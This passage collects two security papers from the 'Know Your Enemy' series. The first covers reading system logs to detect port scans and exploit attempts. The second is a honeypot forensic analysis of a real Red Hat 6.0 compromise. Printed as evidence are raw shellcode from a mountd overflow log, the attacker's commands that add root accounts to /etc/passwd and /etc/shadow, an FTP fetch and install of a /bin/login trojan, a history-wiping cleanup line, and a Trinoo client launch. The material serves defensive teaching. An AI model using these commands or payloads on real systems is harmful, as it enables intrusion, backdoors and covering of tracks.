is to use a secure method of logging. One option is to replace your syslogd binary with something that has integrity checking and a greater breadth of options. One option is syslog-ng, which you can find at http://www.balabit.hu/products/syslog-ng.html Most of the logs we will use are the ones stored on the remote log server. As mentioned earlier, we can be fairly confident of the integrity of these logs since they are on a remote and secured system. Also, since all systems are logging to a single source, it is much easier to identify patterns in these logs. We can quickly review what's happening to all the systems in one source. The only time you would want to review logs stored locally on a system is to compare them to what the log server has. You can determine if the local logs have been altered by comparing them to the remote logs. Pattern Matching By looking at your log entries, you can usually determine if you are being port scanned. Most Script Kiddies scan a network for a single vulnerability. If your logs show most of your systems being connected from the same remote system, on the same port, this is most likely an exploit scan. Basically, the enemy has an exploit for a single vulnerability, and they are scanning your network for it. When they find it, they exploit it. For most Linux systems, TCP Wrappers is installed by default. So, we would find most of these connections in /var/log/secure. For other flavors of Unix, we can log all inetd connections by launching inetd with the "-t" flag, facility daemon. A typical exploit scan would look like something below. Here we have a source scanning for the wu-ftpd vulnerability. /var/log/secure Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200 Here we see the source 192.168.11.200 scanning our network. Notice how the source sequentially scans each IP (this is not always the case). This is the advantage of having a log server, you can more easily identify patterns in your network since all the logs are combined. The repeated connections to port 21, ftp, indicated they were most likely looking for the wu-ftpd exploit. We have just determined what the black-hat is looking for. Often, scans tend to come in phases. Someone will release code for an imap exploit, you will suddenly see a rush of imaps scans in your logs. The next month you will be hit by ftp. An excellent source for current exploits is http://www.cert.org/advisories/ Sometimes, tools will scan for a variety of exploits at the same time, so you may see a single source connecting to several ports. Keep in mind, if you are not logging the service, you will not know if you are scanned for it. For example, most rpc connections are not logged. However, many services can simply be added to /etc/inetd.conf for logging with TCP Wrappers. For example, you can add an entry in /etc/inetd.conf for NetBus. You can define TCP Wrappers to safely deny and log the connections (see Intrusion Detection for more info on this). What's the Tool? Sometimes you can actually determine the tools being used to scan your network. Some of the more basic tools scan for a specific exploit, such as ftp-scan.c. If only a single port or vulnerability is being probed on your network, they are most likely using one of these "single mission" tools. However, there exist tools that probe for a variety of vulnerabilities or weaknesses, the two very popular tools are sscan by jsbach and nmap by Fyodor. I've selected these two tools because they represent the two "categories" of scanning tools. I highly recommend you run these tools against your own network, you may be surprised by the results :) NOTE:. The tool sscan is now over a year old and severely out of date. sscan is discussed only as an example. For scanning your own network for vulnerabilities, I highly recommend the tool Nessus. sscan represents the "all purpose" Script Kiddie scanning tool. It probes a network for a set of specific vulnerabilities. It is customizable, allowing you to add probes for new exploits. You just give the tool a network and network mask, and it does the rest for you. However, the user must be root to use it. The output is extremely easy to interpret (hence making it so popular): It gives a concise summary of many vulnerable services. All you have to do is run sscan against a network, grep for the word "VULN" in the output, and then run the "exploit du jour". Below is an example of sscan ran against the system mozart (172.17.6.30). otto #./sscan -o 172.17.6.30 --------------------------<[ * report for host mozart * <[ tcp port: 80 (http) ]> <[ tcp port: 23 (telnet) ]> <[ tcp port: 143 (imap) ]> <[ tcp port: 110 (pop-3) ]> <[ tcp port: 111 (sunrpc) ]> <[ tcp port: 79 (finger) ]> <[ tcp port: 53 (domain) ]> <[ tcp port: 25 (smtp) ]> <[ tcp port: 21 (ftp) ]> --<[ *OS*: mozart: os detected: redhat linux 5.1 mozart: VULN: linux box vulnerable to named overflow. -<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request. -<[ *FINGER*: mozart: root: account exists. --<[ *VULN*: mozart: sendmail will 'expn' accounts for us --<[ *VULN*: mozart: linux bind/iquery remote buffer overflow --<[ *VULN*: mozart: linux mountd remote buffer overflow ---------------------------<[ * scan of mozart completed * Nmap represents the "raw data" tool set. It doesn't tell you what vulnerabilities exist, rather, it tells you what ports are open, you determine the security impact. Nmap has quickly become the port scanner of choice, and with good reason. It takes the best of a variety of port scanners and puts all their functionality into a single tool, including OS detection, various packet assembly options, both UDP and TCP scanning, randomization, etc. However, you need networking skills to use the tool and interpret the data. Below is an example of nmap ran against the same system. otto #nmap -sS -O 172.17.6.30 Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on mozart (172.17.6.30): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 37 open tcp time 53 open tcp domain 70 open tcp gopher 79 open tcp finger 80 open tcp http 109 open tcp pop-2 110 open tcp pop-3 111 open tcp sunrpc 143 open tcp imap2 513 open tcp login 514 open tcp shell 635 open tcp unknown 2049 open tcp nfs TCP Sequence Prediction: Class=truly random Difficulty=9999999 (Good luck!) Remote operating system guess: Linux 2.0.35-36 Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds By reviewing your logs, you can determine which of these tools were used against you. To do this, you have to understand how the tools work. First, an sscan will log in as follows (this is a default scan with no modifications to any config files): /var/log/secure Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200 Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200 Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200 Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200 Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200 Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200 Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200 /var/log/maillog Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while reading line user=??? host=[192.168.11.200] Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while reading line user=??? host=[192.168.11.200] Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root /var/log/messages Apr 14 21:03:09 mozart telnetd[11682]: ttloop: peer died: Invalid or incomplete multibyte or wide character Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed sscan also scans for cgi-bin vulnerabilities. These probes will not be logged by syslogd, you will find them in access_log. I decided to included them anyway for your edification :) /var/log/httpd/access_log 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/php.cgi HTTP/1.0" 404 168 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/handler HTTP/1.0" 404 168 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webgais HTTP/1.0" 404 168 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/websendmail HTTP/1.0" 404 172 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 172 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/faxsurvey HTTP/1.0" 404 170 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/htmlscript HTTP/1.0" 404 171 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 174 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/perl.exe HTTP/1.0" 404 169 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 172 192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.0" 404 187 192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/jj HTTP/1.0" 404 163 Notice how a complete connection was made for all the ports(SYN, SYN-ACK, ACK) then torn down. That is because sscan is determining at the application layer what is going on. Not only does sscan want to know if your ftp port is open, but what ftp daemon is running. The same can be said for imap, pop, etc. This can be seen in sniff traces using sniffit, a tool commonly used to sniff passwords. mozart $ cat 172.17.6.30.21-192.168.11.200.7238 220 mozart.example.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Tue Jun 9 10:43:14 EDT 1998) ready. As you see above, a complete connection was made to determine the version of wu-ftpd that was running. When you see the complete connections in your logs, as shown above, you are most likely being scanned by an exploit tool. These tools are making a complete connection to determine what you are running. Nmap, like most port scanners, does not care what you are running, but if you are running specific services. For this, nmap has a powerful set of options, letting you determine what kind of connection to make, including SYN, FIN, Xmas, Null, etc. For a detailed description of these options, check out http://www.insecure.org/nmap/nmap_doc.html. Because of these options, your logs will be different based on the options selected by the remote user. A connection made with the -sT flag is a complete connection, so the logs will like similar to sscan, however by default nmap scans more ports. /var/log/secure Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200 Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200 Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200 Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200 Apr 14 21:20:51 mozart gn[11711]: connect from 192.168.11.200 Apr 14 21:20:51 mozart gn[11711]: error: cannot execute /usr/sbin/gn: No such file or directory Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200 Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200 Apr 14 21:20:52 mozart ipop3d[11714]: connect from 192.168.11.200 Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200 Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200 One thing to keep in mind is the -D (or decoy) option. This nmap option allows the user to spoof the source address. You may see scans from 15 different sources at the same time, but only one of them is the real one. It is extremely difficult to determine which of the 15 was the actual source. More often, users will select the -sS flag for port scanning. This is a stealthier option, as only a SYN packet is sent. If the remote system responds, the connection is immediately torn down with a RST. The logs from such a scan looks as follows (NOTE: Only the first five entries are included here). /var/log/secure Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by peer Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by peer Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by peer Apr 14 21:25:09 mozart imapd[11719]: connect from unknown Apr 14 21:25:09 mozart ipop3d[11720]: warning: can't get client address: Connection reset by peer Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown Apr 14 21:25:09 mozart in.rlogind[11722]: warning: can't get client address: Connection reset by peer Apr 14 21:25:09 mozart in.rlogind[11722]: connect from unknown Notice all the errors in the connections. Since the SYN-ACK sequence is torn down before a complete connection can be made, the daemon cannot determine the source system. The logs show that you have been scanned, unfortunately you do not know by whom. What is even more alarming is, on most other systems (including newer kernels of Linux), none of these errors would have been logged. To qoute Fyodor " ... based on all the 'connection reset by peer' messages. This is a Linux 2.0.XX oddity -- virtually every other system (including the 2.2 and later 2.1 kernels) will show nothing. That bug (accept() returning before completion of the 3-way handshake) was fixed." Nmap includes other stealth option, such as -sF, -sX, -sN where various flags are used, This is what the logs look like for these scans /var/log/secure Notice something here, no logs! Scary huh, you just got scanned and didn't even know it. All three types of scans determined the same results, however you are able to fully log only the first type, -sT (full connection). To detect these stealth scans, you will need to use a different logging application such as tcplogd or ippl Some commercial Firewalls will also detect and log all of these scans (I have confirmed this on Checkpoint Firewall 1). Did They Gain Access? Once you have determined that you were scanned, and what you were looking for, the next big question is "Did they get in?". Most of today's remote exploits are based on buffer overflows (otherwise known as smashing the stack). Simply stated, a buffer overflow is when a program (usually a daemon) receives more input then it expected, thus overwriting critical areas in memory. Certain code is then executed, usually giving the user root access. For more info on buffer overflows, check Aleph1's excellent paper at ftp://ftp.technotronic.com/rfc/phrack49-14.txt. You can normally identify buffer overflow attacks in the /var/log/messages log file (or /var/adm/messages for other flavors of Unix) for attacks such as mountd. You will also see similar logs in maillog for such attacks against imapd. A buffer overflow attack would look like this. Apr 14 04:20:51 mozart mountd[6688]: Unauthorized access by NFS client 192.168.11.200. Apr 14 04:20:51 mozart syslogd: Cannot glue message parts together Apr 14 04:20:51 mozart mountd[6688]: Blocked attempt of 192.168.11.200 to mount ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P3Ű3Ŕ°^[Í~@3Ň3Ŕ~KÚ°^FÍ~@ţÂuô1Ŕ°^BÍ~@~EŔubëb^V¬<ýt^FţŔt^Këő°0ţČ~HF˙ëě^°^B~ I^FţČ~IF^D°^F~IF^H°f1ŰţĂ~IńÍ~@~I^F°^Bf~IF^L°*f~IF^N~MF^L~IF^D1Ŕ~IF^P°^P~IF^H° fţĂÍ~@°^A~IF^D°fł^DÍ~@ë^DëLëR1Ŕ~IF^D~IF^H°fţĂÍ~@~HĂ°?1ÉÍ~@°?ţÁÍ~@°?ţÁÍ~@¸.bin@~ I^F¸.sh!@~IF^D1Ŕ~HF^G~Iv^H~IF^L°^K~Ió~MN^H~MV^LÍ~@1Ŕ°^A1ŰÍ~@čE˙˙˙˙ý˙Privet ADMcrew~P(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(Apr 14 04:20:51 mozart ^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^ E^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E ^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^ H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E ^H(-^E^H(-^E When you see something like this in your log files, someone has attempted to exploit your system. It is difficult to determine if the exploit was successful. One way to do this is, following the exploit attempt, see if there are any connections from the remote source to your system. If they successfully login from the remote system, they have access. Another clue is if you find the accounts "moof", "rewt", "crak0", or "w0rm" added to your /etc/passwd file. These accounts, uid 0, are added by some of the more common exploit scripts. Once a black-hat gains access, normally the first thing they do is wipe your logs clean and trojan your logging (syslogd), for more information, see Know Your Enemy: III. From this point on, you will not receive any logs from your system as everything has been compromised. What you do next is subject for another article :). Until then, I recommend you check out http://www.cert.org/nav/recovering.html To help me find anomalies in my log files, I whipped up a shell script that scans my logs for me For more detailed information on grepping and sorting log files, check out this posting by Marcus Ranum. Bourne shell script Korn shell script Conclusion Your system logs can tell you a great deal about the enemy. However, the first step is guaranteeing the integrity of your log files. One of the best ways to do that is use a remote log server that receives and stores logs from all systems. Once secured, you can then identify patterns in your log files. Based on these patterns and log entries, you can determine what the black-hat is looking for, and potentially what tools they are using. Based on this knowledge, you can better secure and protect your systems. @HWA 304.0 [IND] Paper: Know your enemy #3: Forensic Analysis by Lance Spitzner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Study of an Attack Know Your Enemy: A Forensic Analysis Lance Spitzner http://www.enteract.com/~lspitz/papers.html Last Modified: 23 May 2000 This paper is a continuation of the Know Your Enemy series. The first three papers covered the tools and tactics of the black-hat community. This paper, the fourth of the series, studies step by step a successful attack of a system. However, instead of focusing on the tools and tactics used, we will focus on how we learned what happened and pieced the information together. The purpose is to give you the forensic skills necessary to analyze and learn on your own the threats your organization faces. Background The information covered here was obtained through the use of a honeypot. The honeypot was a default server installation of Red Hat 6.0. No modifications were made to the default install, so the vulnerabilities discussed here exist on any default RH 6.0 installation. Also, none of the data presented here has been sanitized. All IP addresses, user accounts, and keystrokes discussed here are real. This is done on purpose to both validate the data and give a better understanding of forensic analysis. Only the passwords have been modified to protect the compromised systems. All sniffer information presented here is in snort format. Snort is my sniffer and IDS system of choice, due to its flexibility, capabilities, and price (its free). All actions commited by the black-hat were captured with snort. I use the IDS signatures supplied by Max Vision at www.whitehats.com. You can query his arachNIDs database for more information on all the alerts discussed throughout this paper. You can find my snort configuration and signature file (including the command line options I use) here. Once you are done reading the paper, you can conduct your own forensic analysis, as I have supplied all the raw data. As you read this paper, take note of how many different systems the black-hat uses. Also, throughout this paper, the black-hat is identified as she, but we have no idea what the true gender is. The Attack On 26 April, at 06:43 snort alerted me that one of my systems had be attacked with a 'noop' attack. Packet payloads containing noops are an indication of a buffer overflow attack. In this case, snort had detected the attack and logged the alert to my /var/log/messages file (which is monitored by swatch). Note: throughout this paper, the IP address 172.16.1.107 is the IP address of the honeypot. All other systems are the IP addresses used by the black-hat. Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 My honeypots receive numerous probes, scans and queries on a daily basis. However, an alert like this gets my immediate attention, as it indicates a system may have been compromised. Sure enough, less then two minutes later system logs indicate the system is compromised, as our attacker initiates a connection and logins to the box. Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506) Our intruder has gained super user access and now controls the system. How was this accomplished, what happened? We will now begin our forensic analysis and put the pieces together, step by step. The Analysis When studying an attack, the best place to start is the beginning, where did the black-hat start? Black-hats normally start with information gathering, they need to determine what vulnerabilities exist before they can strike. If your system has been compromised, this is normally not the first time the black-hat has communicated with that system. Most attacks involve some type of information gathering before the attack is launched. So, this is where we will start, the black-hat's information gathering stage. If we look at the alert above, the attack was on port 53. This indicates a DNS attack was launched on our system. So I will begin by looking through my snort alerts and find possible information probes for DNS. We find a DNS version query probe coming from the same system that attacked us. Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Notice the date of the probe, April 25. Our system was attacked April 26, from the same system. Our system was compromised the day after the probe. I am guessing that an automated tool was used by our black-hat to scan numerous systems for a known DNS vulnerability. After the scan was ran, the black-hat reviewed the results, identified vulnerable systems (including ours) and then launched her exploit. We have now pieced together the first part of our story. Our black-hat scanned us on 25 April, then exploited the system the following day. Based on our IDS alerts, it appears we were hit by a script kiddie with a well known DNS vulnerability. But how was the attack launched, and how does it work? Lets find out. The Exploit Like most commercial IDS systems, snort has the capability of showing us the packet load data of all IP packets. We will use this capability to conduct an analysis of the exploit. The exploit information was obtained from the snort logs (stored in tcpdump binary format). I queried the snort log and began reviewing the packets starting when the attack was launched. I did not limit my information query to the host 63.336.81.13, as the attacker may have used other systems. This is in fact the case, as our black-hat used at least three different systems to run the exploit. The goal of the exploit is to gain a root shell on the remote system. Once the black-hat gains a root shell, they can run any command as root. Normally an account is placed in the /etc/passwd and /etc/shadow file. You can find both the exploit and remote commands executed in the detailed forensic analysis. Once the exploit was ran and a root shell obtained, the following commands were ran as root. cd /; uname -a; pwd; id; Linux apollo.uicmba.edu 2.2.5-15 #1 Mon Apr 19 22:21:09 EDT 1999 i586 unknown / uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) echo "twin::506:506::/home/twin:/bin/bash" >> /etc/passwd echo "twin:w3nT2H0b6AjM2:::::::" >> /etc/shadow echo "hantu::0:0::/:/bin/bash" >> /etc/passwd echo "hantu:w3nT2H0b6AjM2:::::::" >> /etc/shadow Our black-hat runs several commands as root. First, she confirms the system she is on (uname -a), the directory (pwd) and then confirms her uid (id). She then adds two user accounts to the system, twin and hantu, both with the same password. Note that twin has the UID of 506 and hantu has the UID of 0 (on a side note, hantu means ghost in Indonesian). Remeber, most systems do not let UID 0 telnet to the box. So she had to create an account that would give her remote access, then another account that would give her UID 0. So, our black-hat ran an exploit on DNS, gained a root shell, then inserted two accounts. Within 90 seconds of the exploit she telnets into the box and gains root access (see timestamps of logs below). So, what does she do next? Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506) Gaining Access Fortunately for us, telnet is a plaintext protocol, the data is not encrypted. This means we can decode the sniffer traces and capture all the her keystrokes. Snort has already done this for us, another reason I prefer snort. By analyzing the keystrokes snort captured of the telnet sessions, we can determine what our black-hat does. What I like best about decoding telnet sessions as we capture not only STDIN (the keystrokes) but STDOUT and STDER. Lets review the telnet sessions and identify the black-hats activities (comments in RED). First, our friend telnets to the box (from 213.28.22.189) as twin and then gains superuser access as hantu. Remeber, she cannot just telnet in as hantu as UID 0 is restricted for remote access. #' !"'!"# ' 9600,9600'VT5444VT5444 Red Hat Linux release 6.0 (Shedwig) Kernel 2.2.5-15 on an i586 login: twin Password: Password: hax0r No directory /home/twin! Logging in with home = "/". [twin@apollo /]$ su hantu Password: Password: hax0r Next, our friend ftps to another system to get her toolkit. [root@apollo /]# ftp 24.112.167.35 Connected to 24.112.167.35. 220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. Name (24.112.167.35:twin): welek 331 Password required for welek. Password:password 230 User welek logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get bj.c local: bj.c remote: bj.c 200 PORT command successful. 150 Opening BINARY mode data connection for bj.c (1010 bytes). 226 Transfer complete. 1010 bytes received in 0.115 secs (8.6 Kbytes/sec) ftp> quit 221-You have transferred 1010 bytes in 1 files. 221-Total traffic for this session was 1421 bytes in 1 transfers. 221-Thank you for using the FTP service on linux. 221 Goodbye. Third, she grabs her backdoor, compiles bj.c, and installs it as a replacement for /sbin/login. Notice all the commands executed at the command prompt for the compile. It appears that all the compile commands were executed 'cut and paste' style. [root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c bj.c:16: unterminated string or character constant bj.c:12: possible real start of unterminated constant She now attempts to implement the compiled backdoor [root@apollo /]# chown root:bin login chown: login: No such file or directory [root@apollo /]# chmod 4555 login chmod: login: No such file or directory [root@apollo /]# chmod u-w login chmod: login: No such file or directory [root@apollo /]# cp /bin/login /usr/bin/xstat [root@apollo /]# cp /bin/login /usr/bin/old [root@apollo /]# rm /bin/login [root@apollo /]# chmod 555 /usr/bin/xstat [root@apollo /]# chgrp bin /usr/bin/xstat [root@apollo /]# mv login /bin/login mv: login: No such file or directory [root@apollo /]# rm bj.c Dooh! She just can't get it right, lets try again. She ftp's to the site re-downloads the backdoor. [root@apollo /]# ftp 24.112.167.35 Connected to 24.112.167.35. 220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. Name (24.112.167.35:twin): [root@apollo /]# ftp 24.112.167.35 Connected to 24.112.167.35. 220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. Name (24.112.167.35:twin): welek 331 Password required for welek. Password:331 Password required for welek. Password:password 230 User welek logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get bj.c qulocal: bj.c remote: bj.c 200 PORT command successful. u150 Opening BINARY mode data connection for bj.c (1011 bytes). 226 Transfer complete. 1011 bytes received in 0.134 secs (7.3 Kbytes/sec) ftp> itit 221-You have transferred 1011 bytes in 1 files. 221-Total traffic for this session was 1422 bytes in 1 transfers. 221-Thank you for using the FTP service on linux. 221 Goodbye. This is now her second attempt at compiling the backdoor. Notice the exact same "cut and paste" commands are used. [root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c bj.c: In function `owned': bj.c:16: warning: assignment makes pointer from integer without a cast Now we see the compiled backdoor implemented. The valid copy of /bin/login is moved to /usr/bin/xstat, while the compiled trojan bj.c is used to replace /bin/login. This is the backdoor. This trojan allows anyone with the TERM setting of vt9111 unauthorized access [root@apollo /]# chown root:bin login [root@apollo /]# chmod 4555 login [root@apollo /]# chmod u-w login [root@apollo /]# cp /bin/login /usr/bin/xstat cp: /bin/login: No such file or directory [root@apollo /]# cp /bin/login /usr/bin/old cp: /bin/login: No such file or directory [root@apollo /]# rm /bin/login rm: cannot remove `/bin/login': No such file or directory [root@apollo /]# chmod 555 /usr/bin/xstat [root@apollo /]# chgrp bin /usr/bin/xstat [root@apollo /]# mv login /bin/login Now she covers her moves. I believe this is scripted, cut and paste. Look at all the commands she executed at a single command prompt. Also, I believe this is a 'generic' clean up script, notice how it tries to remove files that do not exist (such as /tmp/h). [root@apollo /]# rm bj.c [root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por qquituit [root@apollo /.s]# ftpr 137.132.216.35 login: ftrp: command not found [root@apollo /.s]# [root@apollo /.s]# ftp 137.132.216.35 Connected to 137.132.216.35. 220 nusnet-216-35.dynip.nus.edu.sg FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready. She gains access with the same user name that was inserted in our box. Name (137.132.216.35:root): twin 331 Password required for twin. Password:hax0r 230 User twin logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get d.tar.gz local: d.tar.gz remote: d.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for d.tar.gz (8323 bytes). 150 Opening BINARY mode data connection for d.tar.gz (8323 bytes). 226 Transfer complete. 8323 bytes received in 1.36 secs (6 Kbytes/sec) ftp> quit 221-You have transferred 8323 bytes in 1 files. 221-Total traffic for this session was 8770 bytes in 1 transfers. 221-Thank you for using the FTP service on nusnet-216-35.dynip.nus.edu.sg. 221 Goodbye. [root@apollo /.s]# gunzip d* [root@apollo /.s]# tar -xvf d* daemon/ daemon/ns.c daemon/ns [root@apollo /.s]# rm -rf d.tar [root@apollo /.s]# cd daemon [root@apollo daemon]# chmod u+u+x nsx ns [root@apollo daemon]# ./ns Our black-hat has just installed and started Trinoo client. Next, she attempts to hop to another compromised system. Notice how she sets her VT TERM. This system most likely also has a backdoor. The connection fails since DNS is not working. [root@apollo daemon]# TERM=vt1711 [root@apollo daemon]# telnet macau.hkg.com macau.hkg.com: Unknown host [root@apollo daemon]# exit exit Our friend leaves, only to return later from yet a different system (137.132.216.35) and attempt more michief. !"' #'!"# ' 9600,9600'VT9111VT9111 Red Hat Linux release 6.0 (Shedwig) Kernel 2.2.5-15 on an i586 apollo /]# TERM=vt9111 telnet ns2.cpcc.cc.nc.us ns2.cpcc.cc.nc.us: Unknown host 